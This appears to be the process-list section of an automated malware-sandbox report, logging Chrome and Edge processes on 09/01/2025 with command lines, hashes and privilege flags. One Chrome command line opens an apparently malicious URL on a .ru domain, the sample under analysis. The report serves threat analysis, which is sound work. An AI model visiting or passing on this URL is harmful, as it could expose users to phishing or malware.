                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2032,i,5592853975208518090,15640883060359809183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:09:29:39
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bryf.atchirlisc.ru/EeMAGvIe/"
                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                    Start time:09:30:00
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?url=http%3A%2F%2Fwww.bing.com%2Fchat%3Fform%3DWSBSH1%26cvid%3Db374da154d8a4e3bb912f43f50eaafd2%26nclid%3D4C9C2B2D0465FD7A42C74C7E93CFB630%26ts%3D1736433000464%26nclidts%3D1736433000%26tsms%3D464&timestamp=1736433000464&source=WindowsSearchBox&medium=CodexUpsell
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                    Start time:09:30:01
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2604 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:09:30:04
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6276 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:09:30:04
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6592 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                    Start time:09:30:07
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff66a520000
                                                                                                                                                                                    File size:1'255'976 bytes
                                                                                                                                                                                    MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                    Start time:09:30:07
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff66a520000
                                                                                                                                                                                    File size:1'255'976 bytes
                                                                                                                                                                                    MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                    Start time:09:30:18
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                    Start time:09:30:18
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,12039556330216411981,17761890535772019975,262144 /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                    Start time:09:30:26
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                    Start time:09:30:26
                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2068,i,391148098692564676,17790295371905818145,262144 /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff67dcd0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    No disassembly